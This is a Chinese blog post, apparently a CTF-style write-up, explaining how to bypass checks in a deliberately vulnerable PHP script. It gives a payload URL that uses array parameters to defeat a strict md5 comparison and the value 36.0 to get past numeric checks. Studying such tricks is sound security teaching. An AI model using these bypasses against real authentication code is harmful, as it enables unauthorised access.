• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号
登陆 注册
描述文字

PHP绕过MD5真等于和数值绕过

原作者: [db:作者] 来自: [db:来源] 收藏 邀请 
 1 <?php
 2 $username=True;
 3 if(intval($_GET['username'])){
 4     preg_match("/[a-zA-Z0-9]*/", $_GET['username'],$username);
 5     if ($username) {
 6         echo "<center>username:USER</center><br/>";
 7     }
 8 }
 9 if (isset($_GET['name']) and isset($_GET['password'])){
10     if ($_GET['name']==$_GET["password"])
11         echo "账号密码不能一致";
12     else if(md5($_GET["name"])===md5($_GET["password"]))
13             if (is_numeric($_GET["id"])&&$_GET["id"]!=='36'&&!preg_match('/\s/', $_GET["id"])) 
14             {
15                 if ($_GET["id"]==36)
16                     die('<center>password:PASS</center>');
17             }
18         else
19             echo "密码错误!";
20 }
21 
22 ?>

payload:

http://127.0.0.1/test.php?username=12&name[]=1&password[]=2&id=36.0

在第12行md5是===,所以不能利用md5开头是0e的字符串来绕过,但可以利用数组绕过

在第13行因为$_GET["id"]!=='36'所有,可以利用36.0或者0x24(36的16进制)绕过,但第15行$_GET["id"]==36,所以只能用36.0绕过

鲜花
握手
雷人
路过
鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
More+
上一篇:
调试PHP,跟踪MySql执行语句发布时间:2022-07-10
下一篇:
PHP5中PDO的简单使用发布时间:2022-07-10
热门推荐
More+
热门话题
More+
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap